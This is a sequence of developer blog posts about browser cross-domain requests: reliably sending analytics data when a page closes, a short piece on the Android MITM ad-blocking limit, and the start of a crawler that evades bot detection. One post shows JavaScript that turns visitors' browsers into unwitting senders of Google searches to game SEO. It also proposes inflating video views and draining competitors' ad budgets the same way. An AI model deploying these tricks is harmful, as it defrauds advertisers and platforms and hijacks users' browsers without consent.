<p>To remove ads from applications that use secure connections (e.g., HTTPS), the ad blocker must launch a MITM attack, replacing the application’s security certificates with its certificate.</p>
</blockquote>
<p>The issue is that the Android API level 24 distrust user certificates and thus there is no way to remove ads on the fly.</p>
<blockquote>
<p>But since the latest Android update for Nougat, all applications targeting API level 24 and above (YouTube is one of these applications) distrust certificates hosted in the user’s trust store. This means that the videos on the YouTube app will not play if we try to replace its security certificate with our own to remove ads.</p>
</blockquote>Abusing image tags for cross domain requests2020-12-15T20:50:00+01:002020-12-15T20:50:00+01:00Nikolai Tschachertag:incolumitas.com,2020-12-15:/2020/12/15/abusing-img-tags-for-cross-domain-requests/<p>Cross domain requests with <code><img></code> tags are not bound to the same origin policy. I will shed light on several possibilities how malicious web site owners can potentially abuse cross domain request done with <code><img></code> and <code>script</code> tags created with JavaScript.</p><p>I am currently in the process of developing an analytics application in JavaScript. One of my requirements is to transmit analytics data right before the user leaves the surveyed website. A common strategy is to send the analytics data when the event <code>visibilitychange</code> is fired and the <code>visibilityState</code> changes to <code>hidden</code>:</p>
<div class="highlight"><pre><span></span><code><span class="nb">document</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"visibilitychange"</span><span class="p">,</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">visibilityState</span> <span class="o">===</span> <span class="s1">'hidden'</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// somehow send analytics data back home</span>
<span class="c1">// for example like this:</span>
<span class="nx">navigator</span><span class="p">.</span><span class="nx">sendBeacon</span><span class="p">(</span><span class="nx">url</span><span class="p">,</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">data</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p>However, other people that also rely on a stable cross browser transmission solution pointed out that <code>navigator.sendBeacon</code> is not the most reliable method. See for example this blog post: <a href="https://volument.com/blog/sendbeacon-is-broken">Beacon API is broken</a>.</p>
<p>This is why some people suggest to use the good old <code><img></code> tag to transmit data. The idea is to transmit your data in the query string of an GET request similar to this:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">image</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Image</span><span class="p">;</span>
<span class="nx">image</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="s1">'https://example.org?data=someDataToStore'</span><span class="p">;</span>
</code></pre></div>
<p>The advantage is that requests originating from an <code><img></code> tag are not suspectible to the same origin policy. This means that cross domain requests are allowed. An alternative to <code><img></code> tags is to use an script to make an cross origin request:</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="nx">addScript</span><span class="p">(</span><span class="nx">src</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">script</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="s1">'script'</span><span class="p">);</span>
<span class="nx">script</span><span class="p">.</span><span class="nx">setAttribute</span><span class="p">(</span><span class="s1">'src'</span><span class="p">,</span> <span class="nx">src</span><span class="p">);</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">appendChild</span><span class="p">(</span><span class="nx">script</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p>The same origin policy is very important to maintain browser security. It prevents us to make http request to other domains than the domain of the origin of the webpage. For example, JavaScript loaded from the domain <code>example.org</code> cannot make an <code>fetch()</code> request to any other domain than itself (except domains where the <code>Access-Control-Allow-Origin</code> header is accordingly configured).</p>
<p>Since requesting scripts will only work when the requested resource is served with the <code>content-type: application/javascript; charset=utf-8</code> response header and images are only obtained when the response header content type is something like <code>content-type: image/webp</code>, we have no possibility to get the response contents of a cross domain request.</p>
<p>However, the request is nevertheless fired. The browser can only judge about Cross-Origin Read Blocking (CORB) after the requested server sent an response. Put differently: In order to falsify if the response is acceptable, a request needs to be made in the first place. But making arbitrary GET request can be dangerous by itself.</p>
<h3>Abusing <code><img></code> requests</h3>
<p>Let's assume we have a small business niche website <code>nichebusiness.com</code> with 500 unique users a day. What would happen if every user's browser executes the following JavaScript:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">image</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Image</span><span class="p">;</span>
<span class="nx">image</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="s1">'https://google.com/search?q=nichebusiness.com%20someHighRankingKeyword'</span><span class="p">;</span>
</code></pre></div>
<p>What happens here? We make a google search with the query <strong>nichebusiness.com someHighRankingKeyword</strong>. The idea is to manipulate the Google search algorithm.
The hope is that a steady search volume of 500 Google searches a day with our own domain and a desired SEO keyword somehow influences Google's algorithm. There are probably way better ways to improve the SEO of a website (and also more ethical ways), but I am just trying to make the point that those <code><img></code> request could potentially have an harmful impact.</p>
<p>But does Google even serve the SERP response if an <code><img></code> tag launches a Google search? After all, there are many headers set by the browser, when a image is requested. </p>
<p>After rebuilding the image request done by the browser, I can confirm that Google answers with a valid SERP response. The search is not rejected based on the request headers. See the reconstructed request below:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">got</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'got'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">fs</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'fs'</span><span class="p">);</span>
<span class="p">(</span><span class="k">async</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">headers</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">connection</span><span class="o">:</span> <span class="s1">'keep-alive'</span><span class="p">,</span>
<span class="s1">'user-agent'</span><span class="o">:</span> <span class="s1">'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36'</span><span class="p">,</span>
<span class="nx">dnt</span><span class="o">:</span> <span class="s1">'1'</span><span class="p">,</span>
<span class="nx">accept</span><span class="o">:</span> <span class="s1">'image/avif,image/webp,image/apng,image/*,*/*;q=0.8'</span><span class="p">,</span>
<span class="s1">'sec-fetch-site'</span><span class="o">:</span> <span class="s1">'cross-site'</span><span class="p">,</span>
<span class="s1">'sec-fetch-mode'</span><span class="o">:</span> <span class="s1">'no-cors'</span><span class="p">,</span>
<span class="s1">'sec-fetch-dest'</span><span class="o">:</span> <span class="s1">'image'</span><span class="p">,</span>
<span class="nx">referer</span><span class="o">:</span> <span class="s1">'https://example.org/'</span><span class="p">,</span>
<span class="s1">'accept-encoding'</span><span class="o">:</span> <span class="s1">'gzip, deflate, br'</span><span class="p">,</span>
<span class="s1">'accept-language'</span><span class="o">:</span> <span class="s1">'de-DE,de;q=0.9,en-DE;q=0.8,en-US;q=0.7,en;q=0.6'</span><span class="p">,</span>
<span class="s1">'if-none-match'</span><span class="o">:</span> <span class="s1">'W/"875-176475a2ebc"'</span><span class="p">,</span>
<span class="s1">'if-modified-since'</span><span class="o">:</span> <span class="s1">'Wed, 09 Dec 2020 11:54:21 GMT'</span>
<span class="p">};</span>
<span class="kd">let</span> <span class="nx">live</span> <span class="o">=</span> <span class="s1">'https://www.google.com/search?q=nichebusiness.com%20someHighRankingKeyword'</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">got</span><span class="p">(</span><span class="nx">live</span><span class="p">,</span> <span class="p">{</span><span class="nx">headers</span><span class="o">:</span> <span class="nx">headers</span><span class="p">,</span> <span class="nx">https</span><span class="o">:</span> <span class="p">{</span> <span class="nx">rejectUnauthorized</span><span class="o">:</span> <span class="kc">false</span><span class="p">}});</span>
<span class="nx">fs</span><span class="p">.</span><span class="nx">writeFileSync</span><span class="p">(</span><span class="s1">'google_serp.html'</span><span class="p">,</span> <span class="nx">response</span><span class="p">.</span><span class="nx">body</span><span class="p">);</span>
<span class="p">})();</span>
</code></pre></div>
<h3>Conclusion</h3>
<p>There are many other ways how such cross domain image requests could potentially be abused:</p>
<ol>
<li>Promote your own YouTube video by increasing views. Make an request to <code>https://www.youtube.com/watch?v={someVideo}</code> in the <code><img></code> tag.</li>
<li>Drain your competitors Google Ads volume by making request to your competitors ad links.</li>
<li>Invoking any other action that can be reached by a GET request.</li>
</ol>Reliable Cross Domain Requests when the User leaves the Page2020-12-10T21:58:00+01:002020-12-13T11:00:00+01:00Nikolai Tschachertag:incolumitas.com,2020-12-10:/2020/12/10/reliable-cross-domain-requests-on-page-close/<p>In this article, I demonstrate how to reliably communicate JSON data to a cross domain server after the user is about to end or interrupt the browsing session by either:</p>
<ul>
<li>switching the focus to another page</li>
<li>switching from the browser to another applicaton</li>
<li>closing the tab</li>
<li>closing the browser</li>
</ul>
<p>or any other means of terminating or interrupting the current browsing session. Mobile devices and desktop devices should be equally supported.</p>
<p>Why do I have this very specific requirement?</p>
<p>I am in the process of developing a JavaScript analytics application
and I need to record user interactions and send those user interactions from any
website to my remote server.</p>
<p>Put differently: I need to record user interactions up until the point where the user leaves the browsing session. The ideal event for this scenario is to attach an event listener to <code>visibilitychange</code>:</p>
<div class="highlight"><pre><span></span><code><span class="nb">document</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"visibilitychange"</span><span class="p">,</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">visibilityState</span> <span class="o">===</span> <span class="s1">'hidden'</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">localStorage</span><span class="p">.</span><span class="nx">setItem</span><span class="p">(</span><span class="s1">'triggeredOnPageClose'</span><span class="p">,</span> <span class="ow">new</span> <span class="nb">Date</span><span class="p">());</span>
<span class="p">}</span>
<span class="p">})</span>
</code></pre></div>
<p>This event fires when the user loses focus of the current window and the page visiblity becomes hidden, for example when the user changes the tab.</p>
<p>However, is the above event also triggered when the user closes the page or closes the entire browser? In order …</p><p>In this article, I demonstrate how to reliably communicate JSON data to a cross domain server after the user is about to end or interrupt the browsing session by either:</p>
<ul>
<li>switching the focus to another page</li>
<li>switching from the browser to another applicaton</li>
<li>closing the tab</li>
<li>closing the browser</li>
</ul>
<p>or any other means of terminating or interrupting the current browsing session. Mobile devices and desktop devices should be equally supported.</p>
<p>Why do I have this very specific requirement?</p>
<p>I am in the process of developing a JavaScript analytics application
and I need to record user interactions and send those user interactions from any
website to my remote server.</p>
<p>Put differently: I need to record user interactions up until the point where the user leaves the browsing session. The ideal event for this scenario is to attach an event listener to <code>visibilitychange</code>:</p>
<div class="highlight"><pre><span></span><code><span class="nb">document</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"visibilitychange"</span><span class="p">,</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">visibilityState</span> <span class="o">===</span> <span class="s1">'hidden'</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">localStorage</span><span class="p">.</span><span class="nx">setItem</span><span class="p">(</span><span class="s1">'triggeredOnPageClose'</span><span class="p">,</span> <span class="ow">new</span> <span class="nb">Date</span><span class="p">());</span>
<span class="p">}</span>
<span class="p">})</span>
</code></pre></div>
<p>This event fires when the user loses focus of the current window and the page visiblity becomes hidden, for example when the user changes the tab.</p>
<p>However, is the above event also triggered when the user closes the page or closes the entire browser? In order to verify this scenario, we
actually have to write a piece of data to the <a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage">browser's local storage</a>, because
we have no meaningful way to debug the occurence of this event otherwise.</p>
<p>So let's to the following steps:</p>
<ol>
<li>Navigate to https://example.org in your browser</li>
<li>Paste the above code snippet in your browser console</li>
<li>Close the tab by clicking on the <code>x</code></li>
<li>Navigate again to https://example.org</li>
<li>Read the local storage with <code>localStorage.getItem('triggeredOnPageClose')</code></li>
<li>If you see the correct date as output, then <code>visibilitychange</code> is fired when closing the tab</li>
<li>Repeat steps 1-6 but instead close the entire browser application</li>
</ol>
<p>After doing the above steps, I could confirm that the event <code>visibilitychange</code> is also triggered when closing the tab or closing the browser.</p>
<p>So during this blog article, we have to find a reliable mechanism to send JSON data to our remote server as soon as the above event occurs.</p>
<p>We have the following requirements:</p>
<ul>
<li>CORS can be enabled on our server, thus CORS requests are allowed</li>
<li>Data transmission needs to be as reliable as possible. It would be very bad if recorded data is lost</li>
</ul>
<h3>The test server</h3>
<p>I use a simple express server to test my application. Below is the server code. It doesn't need much explanation.
CORS support is enabled and the server mostly logs request data when a request arrives.</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">express</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'express'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">cors</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'cors'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">bodyParser</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'body-parser'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">path</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'path'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">app</span> <span class="o">=</span> <span class="nx">express</span><span class="p">();</span>
<span class="kd">const</span> <span class="nx">port</span> <span class="o">=</span> <span class="mf">3333</span><span class="p">;</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">express</span><span class="p">.</span><span class="nx">json</span><span class="p">());</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">cors</span><span class="p">());</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">bodyParser</span><span class="p">.</span><span class="nx">json</span><span class="p">({</span> <span class="nx">limit</span><span class="o">:</span> <span class="s1">'2mb'</span> <span class="p">}));</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">bodyParser</span><span class="p">.</span><span class="nx">text</span><span class="p">());</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/t'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">);</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">sendFile</span><span class="p">(</span><span class="nx">path</span><span class="p">.</span><span class="nx">join</span><span class="p">(</span><span class="nx">__dirname</span><span class="p">,</span> <span class="s1">'../public/test.jpg'</span><span class="p">));</span>
<span class="p">});</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">post</span><span class="p">(</span><span class="s1">'/t'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">body</span><span class="p">);</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">200</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="s1">'ok'</span><span class="p">);</span>
<span class="p">});</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">listen</span><span class="p">(</span><span class="nx">port</span><span class="p">,</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`Example app listening on port </span><span class="si">${</span><span class="nx">port</span><span class="si">}</span><span class="sb">`</span><span class="p">)</span>
<span class="p">});</span>
</code></pre></div>
<p>Let's assume the server listens on <code>https://myserver.com</code> from here on.</p>
<h3>Experimenting with different browser web Api's</h3>
<p>Initially, I thought that sending JSON data to another server would be an ideal fit for the rather new <a href="https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API">fetch()</a> web requests library.</p>
<p>I tried the following:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// Using XMLHttpRequest or fetch</span>
<span class="kd">const</span> <span class="nx">cdRequestMethod</span> <span class="o">=</span> <span class="s1">'fetch'</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">userLeavesPage</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">url</span> <span class="o">=</span> <span class="s1">'https://myserver.com/t?event='</span> <span class="o">+</span> <span class="nx">s</span> <span class="o">+</span> <span class="s1">'-'</span> <span class="o">+</span> <span class="nx">cdRequestMethod</span> <span class="o">+</span> <span class="s1">'-'</span> <span class="o">+</span> <span class="p">(</span><span class="ow">new</span> <span class="nb">Date</span><span class="p">()).</span><span class="nx">getTime</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">cdRequestMethod</span> <span class="o">===</span> <span class="s1">'XMLHttpRequest'</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// uses the XMLHttpRequest api</span>
<span class="kd">var</span> <span class="nx">xmlhttp</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span>
<span class="nx">xmlhttp</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s2">"POST"</span><span class="p">,</span> <span class="nx">url</span><span class="p">);</span>
<span class="nx">xmlhttp</span><span class="p">.</span><span class="nx">setRequestHeader</span><span class="p">(</span><span class="s2">"Content-Type"</span><span class="p">,</span> <span class="s2">"application/json"</span><span class="p">);</span>
<span class="nx">xmlhttp</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">({</span><span class="nx">message</span><span class="o">:</span> <span class="s1">'test'</span><span class="p">}));</span>
<span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="nx">cdRequestMethod</span> <span class="o">===</span> <span class="s1">'fetch'</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">fetch</span><span class="p">(</span><span class="nx">url</span><span class="p">,</span> <span class="p">{</span>
<span class="nx">method</span><span class="o">:</span> <span class="s1">'POST'</span><span class="p">,</span>
<span class="nx">headers</span><span class="o">:</span> <span class="p">{</span>
<span class="s1">'Content-Type'</span><span class="o">:</span> <span class="s1">'application/json'</span><span class="p">,</span>
<span class="p">},</span>
<span class="nx">body</span><span class="o">:</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">({</span><span class="nx">message</span><span class="o">:</span> <span class="s1">'test'</span><span class="p">}),</span>
<span class="p">})</span>
<span class="p">.</span><span class="nx">then</span><span class="p">(</span><span class="nx">data</span> <span class="p">=></span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">data</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"visibilitychange"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">visibilityState</span> <span class="o">===</span> <span class="s1">'hidden'</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">userLeavesPage</span><span class="p">(</span><span class="s2">"visibilitychange:"</span> <span class="o">+</span> <span class="nb">document</span><span class="p">.</span><span class="nx">visibilityState</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">});</span>
</code></pre></div>
<p>Whenever I switch to a different tab, the event <code>visibilitychange</code> is set to state <code>hidden</code> and the POST request is successfully sent
both with <code>fetch()</code> and with <code>XMLHttpRequest</code>.</p>
<p>However, when I close the tab or I close the browser, the POST request is NOT sent. Previously we have established that this should not be the case, because the event <code>visibilitychange</code> is triggered when the tab or browser is closed. It seems like the browser is aborting all pending http requests when the browser or tab is being closed.</p>
<p>This is bad and we cannot accept that. After all, this would result in a loss of valuable analytics data.</p>
<p>Then I wanted to check other events. To get a better understanding of the different events in the DOM, I suggest to read <a href="https://www.igvita.com/2015/11/20/dont-lose-user-and-app-state-use-page-visibility/">this blog article</a>.</p>
<div class="highlight"><pre><span></span><code><span class="nb">window</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"beforeunload"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">userLeavesPage</span><span class="p">(</span><span class="s2">"beforeunload"</span><span class="p">);</span>
<span class="p">});</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"unload"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">userLeavesPage</span><span class="p">(</span><span class="s2">"unload"</span><span class="p">);</span>
<span class="p">});</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"pagehide"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">userLeavesPage</span><span class="p">(</span><span class="s2">"pagehide"</span><span class="p">);</span>
<span class="p">});</span>
</code></pre></div>
<p>I got all around mixed results. For example, <code>fetch()</code> would successfully send the data when attached to the event <code>beforeunload</code>, but <code>XMLHttpRequest</code> would fail to do so.</p>
<p>After a bit of frustration and searching around, I found that following explanation on <a href="https://developer.mozilla.org/en-US/docs/Web/API/Navigator/sendBeacon">MDN page about the sendBeacon Api</a>.</p>
<blockquote>
<p>Ensuring that data has been sent during the unloading of a document has traditionally been difficult, because user agents typically ignore asynchronous XMLHttpRequests made in an unload handler.</p>
</blockquote>
<p>They suggest to use <code>navigator.sendBeacon()</code> instead. MDN promises:</p>
<blockquote>
<p>The navigator.sendBeacon() method asynchronously sends a small amount of data over HTTP to a web server. It’s intended to be used in combination with the visibilitychange event (but not with the unload and beforeunload events).</p>
</blockquote>
<p>This is our salvation! We can just use <code>navigator.sendBeacon()</code>! This Api is exactly made for our use case!</p>
<p>But does <code>navigator.sendBeacon()</code> also fire when the page is being closed when we attach to <code>visibilitychange</code>? Let's try it:</p>
<div class="highlight"><pre><span></span><code><span class="nb">document</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"visibilitychange"</span><span class="p">,</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">visibilityState</span> <span class="o">===</span> <span class="s1">'hidden'</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">url</span> <span class="o">=</span> <span class="s1">'https://myserver.com/t?event='</span> <span class="o">+</span> <span class="p">(</span><span class="ow">new</span> <span class="nb">Date</span><span class="p">()).</span><span class="nx">getTime</span><span class="p">();</span>
<span class="nx">navigator</span><span class="p">.</span><span class="nx">sendBeacon</span><span class="p">(</span><span class="nx">url</span><span class="p">,</span> <span class="s1">'visibilitychange'</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">})</span>
</code></pre></div>
<p>Yes, this works properly. I tested the above snippet on my Linux OS with the most recent chrome browser (<code>Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36</code>) and on my mobile phone. In all 7 cases listed below, the above snippet sends the data correctly to my remote server. I tested the following cases for the event <code>visibilitychange</code>. All requests were sent to a remote server from a different origin with <code>navigator.sendBeacon()</code>:</p>
<ol>
<li>One beacon is sent from the desktop browser when the tab is switched ✓</li>
<li>Two beacons are sent from the desktop browser when the tab is closed ✓</li>
<li>Two beacons are sent from the desktop browser when the browser is closed ✓</li>
<li>One beacon is sent from the smartphone browser when the tab is switched ✓</li>
<li>One beacon is sent from the smartphone browser when the tab is closed ✓</li>
<li>One beacon is sent from the smartphone browser when the browser is closed ✓</li>
<li>One beacon is sent from the smartphone browser when the sleep / power off button is pressed ✓</li>
<li>One beacon is sent from the smartphone browser when the home button is pressed ✓</li>
</ol>
<p>Please do not ask me why the desktop chrome browser sends the beacon twice on case 2. and 3.</p>
<h3>Is <code>navigator.sendBeacon()</code> broken?</h3>
<p>I found the <a href="https://volument.com/blog/sendbeacon-is-broken">following interesting blog article</a> from a company whose main product is an analytics applicaton. They need a very reliable way to transmit data in a cross domain fashion amd tried the sendBeacon Api in production.</p>
<p>Their conclusion is the following:</p>
<blockquote>
<p>On this sample set, about 30% of browsers that claim to support the beacon API failed to deliver the data to our servers when the page was closed, which is the whole purpose of the sendBeacon call.</p>
</blockquote>
<p>They state that all those fancy web Api's</p>
<ul>
<li>fetch()</li>
<li>XMLHttpRequest</li>
<li>navigator.sendBeacon()</li>
</ul>
<p>are unreliable and broken if you want to send data at the end of a browsing sessions on the events
<code>visibilitychange</code>, <code>onbeforeunload</code> or <code>onunload</code>.</p>
<p><a href="https://github.com/mdn/sprints/issues/3722">This Github issue discussion</a> explains in depth why this is the case.</p>
<h3>Solution: Reliable cross domain communication with <code><img></code> tags?</h3>
<p>The above article (https://volument.com/blog/sendbeacon-is-broken) suggested to use <code><img></code> tags to transmit data. The idea is to use the Image object to send analytics data:</p>
<div class="highlight"><pre><span></span><code><span class="nb">document</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"visibilitychange"</span><span class="p">,</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">visibilityState</span> <span class="o">===</span> <span class="s1">'hidden'</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">url</span> <span class="o">=</span> <span class="s1">'https://myserver.com/t?event='</span> <span class="o">+</span> <span class="p">(</span><span class="ow">new</span> <span class="nb">Date</span><span class="p">()).</span><span class="nx">getTime</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">image</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Image</span><span class="p">;</span>
<span class="nx">image</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="nx">url</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">})</span>
</code></pre></div>
<p>I tested the exact same 7 steps as above:</p>
<ol>
<li>One img request is sent from the desktop browser when the tab is switched ✓</li>
<li>One img request is sent from the desktop browser when the tab is closed ✓</li>
<li>One img request is sent from the desktop browser when the browser is closed ✓</li>
<li>One img request is sent from the smartphone browser when the tab is switched ✓</li>
<li>One img request is sent from the smartphone browser when the tab is closed ✓</li>
<li>One img request is sent from the smartphone browser when the browser is closed ✓</li>
<li>One img request is sent from the smartphone browser when the sleep / power off button is pressed ✓</li>
<li>One img request is sent from the smartphone browser when the home button is pressed ✓</li>
</ol>
<p>According to my tests, it doesn't matter whether we use <code>navigator.sendBeacon()</code> or <code><img></code> requests. However,
I only tested with two up-to-date browsers and <strong>my sample size is by far not representative</strong>. The best idea would be to conduct
a statistically sound test under live conditions:</p>
<ul>
<li>Increase a counter on the server side when our analytics javascript is loaded. Add a uuid to the analytics javascript.</li>
<li>The analytics javascript sends a initial request on page load with a uuid generated in the served javascript</li>
<li>Decrease the counter when we receive a analytics request on the event <code>visibilitychange</code> with the matching uuid</li>
</ul>
<p>Hint: Disregard all requests to our application that do not have a valid uuid.</p>
<p>After the above, we have three internal states assigned to the uuid:</p>
<ol>
<li>flag javascript delivered</li>
<li>flag page load request received</li>
<li>flag analytics request received</li>
</ol>
<p>With those flags we can state that the following: Assuming the javascript is delivered and a page load event is received,
but no analytics request ever arrives:</p>
<ul>
<li>either a malicous user intentionally crafted the two requests like that</li>
<li>the browser failed to deliver the request on <code>visibilitychange</code></li>
</ul>
<p>After some more experiments with <code><img></code>, I came up with the following restrictions with <code><img></code> requests:</p>
<ul>
<li>Not more than ~7700 bytes of GET payload allowed for the <code><img></code> <code>src</code> attribute</li>
<li>url data needs to be url safe base64 encoded</li>
<li>because of caching, the same image url cannot be used twice, otherwise the request is not fired</li>
</ul>
<p>In summary, the image requests were fired reliably. Furthermore, <code><img></code> tags probably
are supported on more browsers than the relatively new <code>navigator.sendBeacon()</code> Api.</p>
<p>But, since my application sometimes has more than 7700 bytes (even in compressed form) to send, I would need to send data incrementally. As soon as lets say 15kb of bytes of data is collected, make the first <img> request. When the next 15kb of data is available, send the second batch. The rest of recorded user interaction is sent at the end when the event <code>visibilitychange</code> is triggered.</p>
<p>We just have to keep track of this web session with an counter, such that the server can merge the session as soon
as it is finished.</p>Crawling Infrastructure - Introduction2020-05-18T21:29:00+02:002020-05-18T21:29:00+02:00Nikolai Tschachertag:incolumitas.com,2020-05-18:/2020/05/18/crawling-infrastructure-part-1/<p>In this blog article I will introduce my most recent project: <a href="https://github.com/NikolaiT/Crawling-Infrastructure">The distributed crawling
infrastructure</a> which allows to crawl any website with a low-level Http library or a fully fledged chrome browser configured to evade bot detection attempts.</p>
<p>This introduction is divided into three distinct blog articles, because one blog article would be too large to cover this huge topic.</p>
<ol>
